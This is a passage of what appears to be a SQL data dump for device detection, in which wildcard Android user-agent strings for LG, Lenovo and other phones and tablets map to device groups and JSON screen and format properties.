Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LGL62VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LGL82VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LGLS665) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LGLS675) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LGLS751) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LGLS770) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LGMS330) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LGMS345) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LGMS631) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LGV31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LIFE X8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LIFETAB_S1036X) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_medion_lifetab','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LOGIC X4M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LT C1200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LT50+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LUA-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; LYO-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo A1000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo A1000m) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo A1010a20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo A2010-a) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo A2010-a/S100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo A2010-l) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo A2010l36) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo A2020a40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo A5000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo A5600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo A6000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo A6010) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo A6020a40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo A6020a41) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo A6020a46) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo A6020l37) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo A7000-a) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo A7010a48) AppleWebKit/* (KHTML, like Gecko) Chrome','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo A7010a48) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo A7020a40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo A7020a48) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo A7600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo K50-T5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo K50-t5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo K50a40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo K51c78) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo K52e78) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo K920) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo P1a42) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo P1c58) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo P1ma40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo P70-A otido2010 for 4pda) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo P70-A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo P70-A/S101) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo PB1-750M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo PB1-750P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo PB1-770M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":540,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo S1La40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo S1a40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo S60-a) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo S90-A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo S90-U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo TAB 2 A10-70F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo TAB 2 A10-70L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo TAB 2 A8-50F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":720,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo TAB 2 A8-50L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo TAB 2 A8-50LC) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo TAB S8-50L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo TB2-X30F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo TB2-X30L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo TB3-710F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo TB3-710I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo TB3-710I) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo Vibe Z2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo X2-AP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo X2-EU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo X3a40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo YT3-850F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo YT3-850M) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo YT3-X50F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo YT3-X50L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo YT3-X50M) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo Z2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo Z90-7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo Z90a40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo-A6020l36) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Lenovo_K50-t5) AppleWebKit/* (KHTML, like Gecko) Mobile 